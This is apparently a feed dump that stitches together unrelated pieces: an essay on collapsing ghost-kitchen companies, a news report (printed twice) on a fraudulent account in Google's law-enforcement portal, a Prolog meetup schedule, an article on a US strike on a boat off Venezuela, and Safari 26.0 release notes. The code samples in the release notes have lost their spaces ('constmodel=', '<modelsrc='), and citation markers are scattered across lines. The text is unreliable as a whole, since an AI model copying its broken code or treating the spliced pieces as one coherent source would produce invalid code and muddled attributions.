The numbers, however, tell the brutal story of the Ghost kitchen. Companies raised over $3 billion in venture capital from 2020 to 2022¹. Today, their leaders are shutting down, pivoting away from physical operations, or laying off staff in waves.
You were sold efficiency. You got financial ruin.
The Collapse of the Ghost Kitchen Giants
Kitchen United raised $100 million in July 2022, including funding from grocery giant Kroger². Fifteen months later, the company shut down all eight of its Kroger locations². That represented 44% of Kitchen United's entire 18-unit footprint². The company then announced it would sell or close every remaining physical location and pivot to "software only"
3
.
Translation: We burned through $100 million and have nothing left to show for it.
CloudKitchens raised $850 million in November 2021 at a $15 billion valuation from investors including Microsoft
4
. By early 2023, the company's facilities were running at only 50% occupancy
3
. Internal data showed that 41 out of 71 restaurants at five CloudKitchens locations closed within one year
3
. That's a 58% failure rate.
The company responded with staff layoffs and location closures throughout 2023
5
.
Nextbite endured three rounds of layoffs within 14 months before selling to competitor Sam Nazarian
4
. Celebrity-backed brands like Hotbox by Wiz Khalifa and George Lopez Tacos generated terrible reviews and vanishing sales.
Reef lost its partnership with Wendy's after promising 700 delivery kitchen locations
5
. The deal that was supposed to define the industry's future collapsed completely.
The Hidden Economics That Killed Profitability
Ghost kitchens promised lower costs. The math never worked. Delivery apps charge restaurants up to 30% commission fees
5
. Ghost kitchen operators add rent plus percentage fees on top. Equipment repairs and maintenance create constant expenses. Marketing costs multiply when you have no storefront presence.
Layering these costs together, restaurants discovered a devastating truth: there wasn't enough money left for anyone to make a profit.
Quality control became impossible. Shared kitchen facilities meant that one staff member prepared food for multiple brands simultaneously. No ownership. No accountability. Just assembly-line cooking with zero connection to customers.
When food arrived cold or wrong, customers had no relationship with the brand to forgive mistakes. No loyal regulars. No servers to smooth over problems. Just angry reviews that destroyed virtual brands forever. No reason for repeat business.
The Numbers Behind the Collapse
The global ghost kitchen market was valued at $58.61 billion in 2022
5
. Industry projections show growth to $177.85 billion by 2032
5
. But these projections ignore the operational reality killing companies today.
Approximately 7,606 ghost kitchen operations remain active across the United States
5
. This sounds substantial until you realize how many have closed, pivoted, or failed in the past two years.
The highest-performing ghost kitchens report profit margins between 10-30%
5
. Traditional restaurants typically see margins of 3-5%
5
. But these numbers ignore the failure rates. When 58% of restaurants in your facility close within twelve months, your occupancy and revenue collapse.
Quality Became the Fatal Flaw
Food that travels well requires different recipes, different ingredients, different packaging. Most restaurants never figured this out. Ghost kitchens became synonymous with disappointing food experiences.
Virtual brands with celebrity names generated initial curiosity. But customers who ordered Packed Bowls by Wiz Khalifa once rarely reordered after experiencing cold food and small portions
5
. One Cincinnati operator threw away half his stock of Wiz Khalifa ingredients because customers wouldn't come back
5
.
The first lesson is that name recognition without quality execution equals business failure.
There Is No Connection
When you remove the human connection between restaurant and customer, you remove everything that makes people loyal to restaurants. When food travels twenty minutes in a bag, quality suffers. When customers have problems, there's no manager to smooth things over.
Ghost kitchens became digital fast food factories. Anonymous. Disposable. Forgettable.
The second lesson is that restaurants aren't just about food. They're about places. People. Experiences. Community.
What Actually Works
Focus on your core restaurant first. Make it profitable. Build loyal customers. Control your kitchen. Control your quality. Build a human connection.
If you want to expand, open a second location. Own or lease the space directly. Build your brand in the community. Skip the middleman operators. Skip the celebrity partnerships. Skip the virtual brands with made-up names.
The restaurant business has no shortcuts. It never did. It never will.
The $15 billion lesson is that real restaurants serve real customers in real locations, with real people. Everything else is just an expensive distraction.
9. "Nextbite's failures are a warning for the entire virtual restaurant industry." Nation's Restaurant News, June 14, 2023.
If you want more straight talk about what actually works in restaurants, follow me. No charge. No bullshit. Just the truth about running profitable food businesses from someone who has seen every mistake you're about to make.
I write for operators who want real answers. Not marketing speak. Not consultant double-talk. Just the hard-earned lessons that separate successful restaurants from expensive failures.
Your competition is reading industry magazines full of fluff. You'll get the unvarnished reality that keeps places profitable.
Follow for free. Unsubscribe anytime. Your call.
Google confirms hackers gained access to law enforcement portal
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 21:12:37
Google has confirmed that hackers created a fraudulent account in its Law Enforcement Request System (LERS) platform that law enforcement uses to submit official data requests to the company [...]...
Google has confirmed that hackers created a fraudulent account in its Law Enforcement Request System (LERS) platform that law enforcement uses to submit official data requests to the company
"We have identified that a fraudulent account was created in our system for law enforcement requests and have disabled the account," Google told BleepingComputer.
"No requests were made with this fraudulent account, and no data was accessed."
The FBI declined to comment on the threat actor's claims.
This statement comes after a group of threat actors calling itself "Scattered Lapsus$ Hunters" claimed on Telegram to have gained access to both Google's LERS portal and the FBI's eCheck background check system.
The group posted screenshots of their alleged access shortly after announcing on Thursday that they were "going dark."
Screenshot shared by threat actors
The hackers' claims raised concerns as both LERS and the FBI's eCheck system are used by police and intelligence agencies worldwide to submit subpoenas, court orders, and emergency disclosure requests.
Unauthorized access could allow attackers to impersonate law enforcement and gain access to sensitive user data that should normally be protected.
The "Scattered Lapsus$ Hunters" group, which claims to consist of members linked to the Shiny Hunters, Scattered Spider, and Lapsus$ extortion groups, is behind widespread data theft attacks targeting Salesforce data this year.
The threat actors initially utilized social engineering scams to trick employees into connecting Salesforce's Data Loader tool to corporate Salesforce instances, which was then used to steal data and extort companies.
The threat actors later breached Salesloft's GitHub repository and used Trufflehog to scan for secrets exposed in the private source code. This allowed them to find authentication tokens for Salesloft Drift, which were used to conduct further Salesforce data theft attacks.
Google Threat Intelligence (Mandiant) has been a thorn in the side of these threat actors, being the
first to disclose
the Salesforce and
Salesloft attacks
and warning companies to shore up their defenses.
Since then, the threat actors have been taunting the FBI, Google, Mandiant, and security researchers in posts to various Telegram channels.
Late Thursday night, the group posted a lengthy message to a BreachForums-linked domain causing some to believe the threat actors were retiring.
"You may see our names in new databreach disclosure reports from the tens of other multi billion dollar companies that have yet to disclose a breach, as well as some governmental agencies, including highly secured ones, that does not mean we are still active."
However, cybersecurity researchers who spoke with BleepingComputer believe the group will continue conducting attacks quietly despite their claims of going dark.
Google confirms fraudulent account created in law enforcement portal
Bleeping Computer
www.bleepingcomputer.com
2025-09-15 21:12:37
Google has confirmed that hackers created a fraudulent account in its Law Enforcement Request System (LERS) platform that law enforcement uses to submit official data requests to the company [...]...
Google has confirmed that hackers created a fraudulent account in its Law Enforcement Request System (LERS) platform that law enforcement uses to submit official data requests to the company
"We have identified that a fraudulent account was created in our system for law enforcement requests and have disabled the account," Google told BleepingComputer.
"No requests were made with this fraudulent account, and no data was accessed."
The FBI declined to comment on the threat actor's claims.
This statement comes after a group of threat actors calling itself "Scattered Lapsus$ Hunters" claimed on Telegram to have gained access to both Google's LERS portal and the FBI's eCheck background check system.
The group posted screenshots of their alleged access shortly after announcing on Thursday that they were "going dark."
Screenshot shared by threat actors
The hackers' claims raised concerns as both LERS and the FBI's eCheck system are used by police and intelligence agencies worldwide to submit subpoenas, court orders, and emergency disclosure requests.
Unauthorized access could allow attackers to impersonate law enforcement and gain access to sensitive user data that should normally be protected.
The "Scattered Lapsus$ Hunters" group, which claims to consist of members linked to the Shiny Hunters, Scattered Spider, and Lapsus$ extortion groups, is behind widespread data theft attacks targeting Salesforce data this year.
The threat actors initially utilized social engineering scams to trick employees into connecting Salesforce's Data Loader tool to corporate Salesforce instances, which was then used to steal data and extort companies.
The threat actors later breached Salesloft's GitHub repository and used Trufflehog to scan for secrets exposed in the private source code. This allowed them to find authentication tokens for Salesloft Drift, which were used to conduct further Salesforce data theft attacks.
Google Threat Intelligence (Mandiant) has been a thorn in the side of these threat actors, being the
first to disclose
the Salesforce and
Salesloft attacks
and warning companies to shore up their defenses.
Since then, the threat actors have been taunting the FBI, Google, Mandiant, and security researchers in posts to various Telegram channels.
Late Thursday night, the group posted a lengthy message to a BreachForums-linked domain causing some to believe the threat actors were retiring.
"You may see our names in new databreach disclosure reports from the tens of other multi billion dollar companies that have yet to disclose a breach, as well as some governmental agencies, including highly secured ones, that does not mean we are still active."
However, cybersecurity researchers who spoke with BleepingComputer believe the group will continue conducting attacks quietly despite their claims of going dark.
Update 9/15/25: Article title updated as some felt it indicated a breach.
The 3rd Scryer Prolog Meetup will take place on Nov. 13th and 14th 2025 at the Hochschule Düsseldorf in Düsseldorf, Germany.
This meetup is an excellent opportunity to learn more about the latest developments and applications of Scryer Prolog, a modern free ISO compliant Prolog system.
10.00–11.00
Mark Thom: Recent progress in Scryer Prolog and current developments
11.00–12.00
Kauê Hunnicutt Bazilli: The Rust, C and Wasm embedding APIs of Scryer Prolog
12.00–13.30
Lunch break
13.30–14.30
David C. Norris:
The DEDUCTION Programme
– Dose Escalation Designs in Universal Context of Titration for Oncology Drug Development
14.30–15.00
Coffee break
15.00–15.30
Jonathan McHugh: Guix OS and Scryer – Prolog With Added Func
15.30–17.00
Ulrich Neumerkel: Current developments in the Prolog ISO standard, systematic testing of Prolog implementations
Starting at 19.00
Dinner
↓
Friday, Nov. 14th 2025
10.00–11.00
Christian Jendreiko and Björn Lellmann: An update on recent applications of Scryer Prolog in Quantum Mechanics and Music Theory
11.00–12.00
Kauê Hunnicutt Bazilli and Bryan-Elliott Tam:
Bakage
, a package manager for Prolog systems
12.00–13.30
Lunch break
13:30–14:00
Daniel K. Hashimoto
Towards an Implementation-Independent Interface for Reasoning about Semantic Web in Prolog
14.00–14.30
Barnabás Zahorán and Bennet Bleßmann:
plwm
– An X11 window manager written in Prolog
14.30–15.00
Coffee break
15.00–16.00
Michael Leuschel: Using Prolog to Translate B and Set Theory to Answer Set Programming
16.00–17.00
James J. Tolton: TBD
Starting at 19.00
Dinner
Pentagon Barred Senior House Staffers From Briefing on Venezuela Boat Strike
Intercept
theintercept.com
2025-09-15 20:51:03
A former Pentagon official says “U.S. forces went out and committed murder" in the drone strike off the coast of Venezuela.
The post Pentagon Barred Senior House Staffers From Briefing on Venezuela Boat Strike appeared first on The Intercept....
The Department of War
is thwarting congressional oversight of the Trump administration’s
attack on a boat
off the coast of Venezuela
earlier this month
.
Senior staff from House leadership and relevant committees were barred by the Office of the Secretary of War from attending a briefing on the attack last Tuesday, according to three government sources who spoke on the condition of anonymity. The military cited “alternative compensatory control measures” — the term for enhanced security procedures designed to keep information under wraps — as the reason.
The War Department has attempted to conceal numerous details about the attack that killed 11 people in the Caribbean, including the fact that the vessel altered its course and appeared to have turned back toward shore prior to the strikes. Men on board were said to have
survived an initial strike
, The Intercept reported last week. They were then killed shortly after in a follow-up attack.
“I’m incredibly disturbed by this new reporting that the Trump Administration launched multiple strikes on the boat off Venezuela,” Rep., Sara Jacobs, D-Calif., a member of the House Armed Services Committee’s Subcommittee on Intelligence and Special Operations, said of The Intercept’s coverage. “They didn’t even bother to seek congressional authorization, bragged about these killings — and teased more to come.”
A very small number of Senate and House staffers, mostly from the Armed Services committees, received highly classified briefings about the attack last Tuesday, after the military delayed the meeting for days. Staff for key members of the Senate Foreign Relations Committee and the House Foreign Affairs Committee, which oversee war powers, were conspicuously absent.
Briefers from the office of the Assistant Secretary of Defense for Special Operations/Low-Intensity Conflict, the civilian Pentagon appointee who oversees special operations, made it clear that the attack was not a one-off and that lethal operations would continue, according to three sources familiar with the meetings. The Department of War did not send a lawyer to the briefing, so no expert was available to comment on the legality of the attack.
A senior defense official pushed back on claims that the Pentagon was stymying oversight. “The Department did not bar senior staff from House leadership and relevant committees from attending this briefing,” said the official. “The Department briefed House and Senate Leadership and relevant oversight committee staff with proper security clearance access.”
Pentagon press secretary Kingsley Wilson offered a stale quote from chief spokesperson Sean Parnell (
previously published
by The Intercept) in response to a request for comment about unconfirmed reports to The Intercept that men aboard the vessel attempted to surrender prior to being killed.
In a
letter to the White House
on Wednesday, Sen. Tim Kaine of Virginia and two dozen fellow Democratic senators said the Trump administration has provided “no legitimate legal justification” for the strike. The senators requested answers to 10 key questions regarding the facts surrounding the attack and its supposed legal underpinnings.
“For decades, Congress has wrongly ceded responsibility to the President about when to declare war, and now we’re living with those consequences,” Jacobs told The Intercept. “This is why it’s never been more important for Congress to reclaim our war powers responsibilities and ensure thorough oversight and transparency into all of the Trump Administration’s military actions.”
Last week
Rep. Ilhan Omar, D-Minn., introduced a
war powers resolution
seeking to stop the Trump administration from conducting future strikes in the Caribbean. Omar told The Intercept that it was designed to “terminate hostilities against Venezuela, and against the transnational criminal organizations that the Administration has designated as terrorists this year.”
One former Pentagon legal expert thinks framing the issue around war is a mistake. In her view, this is a clear-cut case of murder.
“A war framing confuses the issue. This is not a war.”
Sarah Harrison, who advised military leaders on legal issues related to human rights and extrajudicial killings in her former role as associate general counsel at the Pentagon’s Office of General Counsel, International Affairs, says that framing the attack in the Caribbean as an act of war is a categorical error. “A war framing confuses the issue. This is not a war,” she explained. “U.S. forces went out and committed murder.”
The legal issues at play were simple, she said: “There was no armed attack on the United States that would allow for the U.S. to use force in self-defense. There is no armed conflict between the United States and any cartel group or any Latin American country. A foreign terrorist designation of any of these groups does not change that. It does not authorize force against those groups.”
“The killing of all 11 of these men was illegal. This was a premeditated murder of suspected criminals — by definition, civilians — based on the facts provided by the administration themselves,” she told The Intercept.
“This president believes that he can kill anyone, anywhere, under any circumstances and not have to rationalize it.”
Sarah Yager, a former senior adviser on human rights to the chair of the Joint Chiefs of Staff and now the Washington director at Human Rights Watch, echoed these concerns. “This president believes that he can kill anyone, anywhere, under any circumstances and not have to rationalize it — and that he will be impugned from any accountability,” she said. “I think this should be a real concern for everyone, that the rule of law is being undermined, and we don’t know what restraints there are on the use of force.”
Harrison, now a senior analyst at the International Crisis Group, emphasized that Secretary of State Marco Rubio made clear that the U.S. could have halted the ship and arrested the crew but chose to kill them instead. “Instead of interdicting it, on the president’s orders, we blew it up — and it’ll happen again,” Rubio
boasted
.
“Under domestic law, and it’s the same rule under international human rights law, the use of lethal force can only be executed if there is an imminent threat to life or serious bodily injury,” said Harrison. “Rubio’s statements underscore the fact that there was no such threat.” She noted that the U.S. military is prohibited by law from executing civilians under the Uniform Code of Military Justice; Title 18 of the U.S. Code, which includes the federal murder statute; and under a long-standing executive order that bans assassinations.
Multiple sources say that Special Operations Command, or SOCOM, conducted the lethal operation. This is considered highly unusual given all the other military assets based in the region. Col. Allie Weiskopf, SOCOM’s director of public affairs, would not comment on the command’s involvement in the attack. “We don’t have anything for you,” she told The Intercept.
Sen. Rand Paul, R-Ky., and others told The Intercept the boat was
attacked by one or more drones
. Harrison said that the special operators who conducted the strike should be made aware that they complied with an unlawful order. She called on members of Congress to speak out on the issue.
The U.S. has
continued to ratchet up tension in the Caribbean. Personnel from a U.S. warship boarded a Venezuelan tuna boat with nine fishermen while it was sailing in Venezuelan waters on Saturday, according to Venezuela’s Foreign Minister Yván Gil. The boat was, he said, “illegally and hostilely boarded by a United States Navy destroyer” and 18 armed U.S. personnel remained on the vessel for eight hours. The fishermen were then released.
“We don’t have anything to offer you on this,” said a spokesperson for the Office of the Secretary of War in response to a request for comment on the incident and an explanation of how raiding a tuna boat contributes to U.S. national security.
Venezuelan officials believe Trump may be renewing
long-running efforts
, which failed during his
first term
, to topple President Nicolás Maduro’s government. Maduro and several close allies were
indicted
in a New York federal court in 2020 on federal charges of narco-terrorism and conspiracy to import cocaine. Last month, the U.S. doubled its reward for information leading to Maduro’s arrest to $50 million.
The Trump administration added the Venezuelan Cartel de los Soles, or Cartel of the Suns, to a list of specially designated global terrorist groups earlier this year, alleging that it is headed by Maduro and high-ranking officials in his administration. In July, Trump also
signed a secret directive
ordering the Pentagon to use military force against some Latin American drug cartels he
has
labeled terrorist organizations
.
The United States has been surging military assets into the Caribbean for weeks.
F-35 stealth fighters
landed in Puerto Rico on Saturday afternoon, joining one of the
largest U.S.
military deployments
to the Caribbean in years. This includes around 4,500 U.S. personnel — including Marines and sailors from the 22nd Marine Expeditionary Unit, seven U.S. warships, and one nuclear-powered attack submarine. And at least two
MQ-9 Reaper drones
were spotted at Coast Guard Air Station Borinquen in Puerto Rico last week. The U.S. is
also engaged
in the
rapid restoration
and
re-outfitting
of the former Roosevelt Roads Naval Station in Ceiba, Puerto Rico, which officially
closed in 2004
.
The 22nd MEU is operating with the amphibious assault ship USS Iwo Jima and the amphibious transport dock ships USS San Antonio and USS Fort Lauderdale. Last Monday, Secretary of War Pete Hegseth visited the Iwo Jima. “What you’re doing right now — it’s not training,” he
told troops
on board. “This is the real-world exercise on behalf of the vital national interests of the United States of America to end the poisoning of the American people.”
Speaking on Fox News, Hegseth did not rule out regime change by the U.S. in Venezuela. “That’s a presidential-level decision, and we’re prepared with every asset that the American military has,” he said.
Jacobs, the California representative, fears that the boat attack in the Caribbean may be the opening salvo of another long-running U.S. military disaster akin to the post-9/11 wars that continue to
grind on
across the globe
today. “We can’t let Donald Trump drag us into another forever war that our youngest generations will pay for with their lives and tax dollars,” she told The Intercept.
We’re happy to share with you what’s arriving in Safari 26.0! It includes big exciting new features, many important improvements, and lots of attention to detail. We can’t wait to see what you do with Anchor Positioning, Scroll-driven animations, High Dynamic Range images, the new HTML
<model>
element, the all-new Digital Credentials API, SVG icon support, WebGPU, WebKit in SwiftUI, and much, much more.
Now every site can be a web app on iOS and iPadOS. Safari in visionOS supports a wider range of immersive media, with spatial videos, Apple Immersive Video, and 180°, 360° & Wide FOV videos. Users can report issues they are having with websites directly from Safari. And there are new features for Web Inspector, Web Extensions, Content Blockers, Lockdown Mode, Device Management, WebKit API and more.
Safari 26.0 adds 75 new features, 3 deprecations, and 171 other improvements. That’s 12% more features and 59% more bug fixes than we announced in June at WWDC.
CSS
Anchor Positioning
Anchor positioning is a new layout mechanism for anchoring one element to another on the web. It pairs well with the
popover
attribute (which shipped in Safari 17.0), making it easy to create responsive menus, tooltips and more.
The easiest way to use anchor positioning is by using
position-area
, which lets you position elements (the “anchor-positioned”) in pre-defined areas relative to another element (the “anchor”). For example, to position an element on the top right corner of an anchor, it’s as simple as
position-area: top right
:
For more advanced use cases, the
anchor()
CSS function calculates the inset value required to line up the edges of the anchor and anchor-positioned elements together. This example achieves the same effect as above, but using
anchor()
instead:
Above, the
anchor(top)
in
bottom: anchor(top)
calculates to a value that lines up the bottom edge of the anchor-positioned to the top edge of the anchor. Similarly,
left: anchor(right)
lines up the right edge of the anchor-positioned to the left edge of the anchor.
As
anchor()
calculates to a value, it can be used in
calc()
for more advanced use cases: exact-to-the-pixel layout, anchoring to multiple anchors, or animated anchors. But for everything else, just stick to the pre-defined areas using
position-area.
The
position-area
syntax came from a proposal we put together, as we thought about how developers would use Anchor Positioning, and how overwhelming it’d be to manually line up edges together using
anchor().
You can also use
position-try
to provide alternative positions when there’s not enough room to display element. For example, to place the element on the bottom right corner when there isn’t enough space on the top right corner, use
position-try: bottom right
.
Scroll-driven animations lets you tie CSS animations to either the timeline of just how far the user has scrolled, or to how far particular content has moved through the viewport, in and out of view.
For example, let’s imagine you want to animate a group of items as they scroll into view.
You can declare that you want the animation to be tied to whether or not they are in view with
animation-timeline: view()
, and specify that the animation should begin just as each item is 0% visible and end when they are 50% across the viewport with
animation-range: 0% 50%
.
Watch
What’s new in Safari and WebKit
at WWDC25 to see the full walkthrough of this example, and learn more about what’s possible with Scroll-driven animations.
Pretty text
Safari 26.0 adds support for
text-wrap: pretty
. Our implementation of
pretty
adjusts how text wraps in an effort to even out the ragged edge, improve hyphenation, and prevent short last lines.
In WebKit, all lines of text in an element are improved by
pretty
, not just a select group of lines at the end of the paragraph. To learn more, read
Better typography with text-wrap pretty
.
Contrast Color
Safari 26.0 adds support for the
contrast-color()
function. It gives you the chance to declare a color that’s either black or white, depending on which will provide more contrast with a second color.
For example, we can make a button with the background color of
var(--button-color)
, and then ask the browser to set the text
color
to either black or white, whichever one provides more contrast against that background.
Now, when the
--button-color
variable is set, both the background and text colors are chosen. Try picking different colors in this demo to see it in action:
Safari 26.0 adds support for the CSS
progress()
function. It’s a math function that returns a number value representing how far along something is, how much progress it’s made between two other values.
Let’s imagine at a particular moment, the is container 450px wide. That’s half way in-between 300px and 600px. The
progress()
function will calculate this to be 50% using this formula:
The result is always a number without any unit. Notice you can mix lengths with different units.
Be mindful that currently
progress
doesn’t clamp
. So it won’t stop at 0% or 100%. It will just grow above 100%, or shrink down below 0%.
The
progress()
function is most powerful when used with other complex math. Combine with animations, gradients, or scroll timelines, and connect one set of conditions with another. There might be even more functions with which it could be combined
coming to CSS in the future
.
And more CSS
Safari 26.0 now supports the
margin-trim: block inline
syntax for trimming in both directions. Learn all about
margin-trim
and what the
block inline
value does in
Easier layout with margin-trim
.
The
overflow-block
and
overflow-inline
properties are supported in Safari 26.0. They are the
logical versions
of
overflow-x
and
overflow-y
, making it even easier to write robust code that supports multiple languages.
Safari 26.0 supports the self-alignment properties
align-self
and
justify-self
in absolute positioning.
There are two features in CSS that are new since the Safari 26 beta announcements at WWDC25. Safari 26.0 now supports the
animation-range
,
animation-range-start
,
animation-range-end
, and
animation-timeline
properties for
::marker
. It also adds support for allowing declarations directly inside
@scope
rule without a style rule ancestor.
Every site can be a web app on iOS and iPadOS
Since January 2008 with iPhone OS 1.1.3, users on iPhone could add website icons to their Home Screen for quick access. Tapping the icon opened the site in Safari. By August 2008 with iPhone OS 2.1, web developers could instead trigger their site to appear in an app-like “
standalone mode
” by adding the
<meta name='apple-mobile-web-app-capable'>
tag to the HTML head.
In 2013, the W3C began standardizing Web Application Manifests to make configuring web app behavior possible with a JSON manifest file. Browser support started in November 2014, and Safari adopted in March 2018 with iOS 11.4.
For the last 17 years, if the website had the specific
meta
tag or Web Application Manifest
display
value in it’s code, when a user added it to their Home Screen on iOS or iPadOS, tapping its icon opened it as a web app. If the website was not configured as such, tapping its icon opened the site in a browser. Users had no choice in the matter, nor visible way to understand why some sites behaved one way while others behaved another.
On Mac, we took a different approach. When introducing
Web Apps on Mac
in Sep 2023, we made the decision to always open websites added to the Dock as web apps. It doesn’t matter whether or not the website has a Web Application Manifest. Users get a consistent
experience
. Add to Dock creates a web app.
Now, we are revising the behavior on iOS 26 and iPadOS 26. By default, every website added to the Home Screen opens as a web app. If the user prefers to add a bookmark for their browser, they can disable “Open as Web App” when adding to Home Screen — even if the site is configured to be a web app. The UI is always consistent, no matter how the site’s code is configured. And the power to define the experience is in the hands of users.
This change, of course, is
not
removing any of WebKit’s current support for web app features. If you include a Web Application Manifest with your site, the benefits it provides will be part of the user’s experience. If you define your icons in the manifest, they’re used.
We value the principles of progressive enhancement and separation of concerns. All of the same web technology is available to you as a developer, to build the experience you would like to build. Giving users a web app experience simply no longer
requires
a manifest file. It’s similar to how Home Screen web apps on iOS and iPadOS never required Service Workers (
as PWAs
do/did on other platforms), yet including Service Workers in your code can greatly enhance the user experience.
Simply put, there are now zero requirements for “installability” in Safari. Users can add any site to their Home Screen and open it as a web app on iOS26 and iPadOS26.
HDR images
The human eye can typically handle seeing things lit by bright light and sitting in dark shadows at the same time. The contrast your eyes see between brightness and darkness is called dynamic range, and it’s very challenging to reproduce.
As digital photography and videography improved by leaps and bounds over the years, the ability to digitally capture a dynamic range has greatly improved. The High Dynamic Range (HDR) format takes this even further, allowing you to capture both a wider dynamic range and increased color gamut, creating more vivid and realistic-looking images and video. Parallel breakthroughs in display technology have made it possible to present such images for others to view, with deep true blacks, pure bright whites and dramatic nuances in between.
WebKit shipped support for HDR video in 2020, in Safari 14.0. Now, in Safari 26.0 for iOS 26, iPadOS 26, macOS 26 and visionOS 26, WebKit adds support for HDR images on the web. You can embed images with high dynamic range into a webpage, just like other images — including images in WebGPU Canvas.
WebKit for Safari 26.0 also adds support for the new
dynamic-range-limit
property in CSS. This property lets you control what happens when presenting a mix of standard dynamic range (SDR) and HDR video or images together. Safari 26.0 supports the
no-limit
and
standard
values. Using
no-limit
tells the browser to let content be as is — HDR content is presented in HDR. Using
standard
converts all of the HDR content to SDR, and displays it within the limits of standard dynamic range. Doing so prevents HDR images and video from appearing overly bright or out of place next to SDR content, which can be especially helpful when users or third-parties provide content.
Immersive video and audio on visionOS
Safari in visionOS 26 now supports a wider range of immersive media, including spatial videos and Apple Immersive Video, and 180°, 360°, and Wide FOV (field of view) videos that conform to the new Apple Projected Media Profile (APMP). Embed your video on a webpage, and let users play it back immersively on a curved surface in 3D space.
This support includes HTTP Live Streaming for all of these immersive media types. The existing
HLS tools
have been updated to support APMP segmentation, and the
HLS specification
has been updated with information on how to identify immersive media in an HLS manifest file.
Now on visionOS, Safari supports the
<model>
element. It’s a brand new HTML element that’s similar to
img
or
video
— only now you can embed interactive 3D models into the webpage, and let users interact with them with a single attribute. And if they want to see your models in their own space at real size, they can drag the models off the page with a single gesture.
Basic usage
The syntax for showing a model is simple. Using the same USDZ files that work with
AR Quick Look
today, you can set the
src
attribute of the
model
element:
Lighting is an important part of making your 3D content look good, and the model element makes that straightforward too. You can apply an environment map as any image, including the high-dynamic range OpenEXR
.exr
and Radiance HDR
.hdr
formats by setting the
environmentmap
attribute:
<modelsrc="teapot.usdz"environmentmap="night.hdr"><imgsrc="fallback/teapot-night.jpg"alt="a teapot at night"></model>
Animation and playback
You can work with models containing animated content too. Use the
autoplay
attribute to declaratively set a model’s animation to run as soon as it loads, keep the animation going using the
loop
attribute,
<modelautoplayloopsrc="teapot-animated.usdz"><imgsrc="fallback/teapot-animated.jpg"alt="a teapot with a stowaway!"></model>
or use the JavaScript API for more fine-grained control:
constmodel=document.querySelector('model');
model.playbackRate=0.5; //set 50% speed
model.currentTime=6; //set the animation to 6 seconds in
model.play();
Rotation and interaction
To let users spin and tumble a model themselves, set the model’s
stagemode
attribute to
orbit
and everything will be handled for you.
<modelstagemode="orbit"src="teapot.usdz"><imgsrc="fallback/teapot-orbit.jpg"alt="a teapot for examining"></model>
Or if you’re after programmatic control, models can be scaled, rotated and moved (translated) using their
entityTransform
property, which can takes a
DOMMatrix
value. You can compose these with functions like
translate
,
rotate
and
scale3d
to orient the model the way you want.
<modelid="rotating-teapot"src="teapot.usdz"><imgsrc="fallback/teapot-rotater.jpg"alt="a teapot for turning"></model>
WebKit for Safari 26.0 adds support for the
W3C’s Digital Credentials API
. In jurisdictions that have issued such credentials, this API allows a website to securely request identity documents (like a driver’s license) from Apple Wallet or other iOS applications that have registered themselves as an Identity Document Provider.
The Digital Credential API is useful for situations where a high-trust credential is needed to access a service online (perhaps renting an automobile). It provides a much safer and user friendly alternative to, for example, a user uploading a photograph of their driver’s license.
The Digital Credentials API leverages the existing
Credential Management API
and introduces a “
digital
” member for requesting identity documents. Requesting an identity document relies on the
ISO/IEC 18013-7 Annex C
international standard, which is identified by the protocol string
"org-iso-mdoc"
.
For example, to request an end-user’s driver’s license, you might do something like this. Create a button in HTML:
asyncfunctionverifyIdentity() {
try {
// Server generated and cryptography signed request data.
constresponse=awaitfetch("drivers/license/data");
constdata=awaitresponse.json();
// Create the request.
constrequest= {
protocol:"org-iso-mdoc",
// What is being rquested, e.g. person's driving privileges
data,
};
// Perform presentment request.
// Must be done through a user gesture!
constcredential=awaitnavigator.credentials.get({
mediation:"required",
digital: {
requests: [request],
},
});
// Send credential to server for decryption.
constresponse=awaitfetch("/decrypt", {
method:"POST",
body:JSON.stringify(credential.data),
headers: {
'Content-Type':'application/json'
}
});
// Display it...
constjson=awaitresponse.json();
presentDetails(json);
} catch (err) {
// Deal with any errors...
}
}
New since WWDC, Digital Credentials API now includes support for the
DigitalCredential.userAgentAllowsProtocol()
static method. This method allows you check if a particular digital credential request protocol is allowed. For example:
if (DigitalCredential.userAgentAllowsProtocol("org-iso-mdoc")) {
// Create an mDoc request
} else {
// Fallback to some other credential request format
}
By the way, Digital Credentials is not yet supported in WKWebView. You can follow WebKit bug
268516
for updates. Also, Digital Credentials API currently has an known issue where mixed protocol requests containing both OpenID4VP and ISO 18013-7 (Annex C) protocols may cause an infinite loading spinner on iOS when scanning QR codes from Chrome on macOS during cross-device identity verification flows.
Web API
Web developers can use the Trusted Types API, now in Safari 26.0, to ensure that end user input does not lead to client-side cross-site scripting (XSS). The API guarantees that input can be sanitized using a developer-specified function before being passed to vulnerable APIs.
We’ve added support for the URL Pattern Standard, which provides an efficient and performant way for web developers to match URLs using regular expressions through the
URLPattern
object. For instance, if your blog posts follow the pattern of
/blog/title-of-the-post
you could match them as follows:
Coming to Safari 26.0 is the WebAuthn Signal API, which allows websites to report credential updates (like username changes or revocations) to credential providers, ensuring a more accurate and consistent user experience with passkeys. The new
PublicKeyCredential.signal
** methods enable websites to communicate these changes, improving credential management and streamlining sign-in flows. This enhancement empowers websites to provide a more seamless and secure WebAuthn experience.
There’s also now support for the File System WritableStream API, enabling direct writing to files within the user’s file system. This API provides an efficient and streamlined way to save data, allowing developers to build applications with enhanced file handling capabilities, such as direct downloads and in-place file editing.
WebKit for Safari 26.0 adds support for the
alg
parameter when importing or exporting Edward’s-curve based JSON Web Keys in WebCrypto.
Support for
scrollMargin
in
IntersectionObserver
is here for more precise intersection detection. This allows you to define margins around the root element, similar to
rootMargin
, providing finer control over when intersection events are triggered.
New since Safari 26 beta 1, the
<dialog>
element now supports the
toggle
event which can be used to watch for whenever the dialog gets opened or closed. And now supports
Scoped Custom Element Registry
.
WebKit for Safari 26.0 also removed the
getSVGDocument()
method from
HTMLFrameElement
to align with the most recent specification.
JavaScript
WebKit for Safari 26.0 adds support for
Pattern Modifiers
in JavaScript’s
RegExp
objects. Pattern modifiers allow more fine-grained control over the behavior of regular expressions through adding and removing flags within a regular expression.
New since WWDC25, WebKit for Safari 26.0 adds support for the
notation
option for
Intl.PluralRules
and the
Intl.Locale.prototype.variants
getter.
SVG icons
Safari 26.0 now supports the SVG file format for icons everyplace there are icons in the interface, including favicons.
For years, favicons were just displayed in the browser window’s URL bar, or in a menu of favorites. Now, icons show up in a range of places across browsers, at wildly different sizes. That includes the Safari start page, where icons represent content in Reading List, iCloud Tabs, Suggestions and Favorites. For web apps, this same icon represents the website on the user’s Home Screen or in their Dock. And icons are, of course, used in Safari tabs and menus.
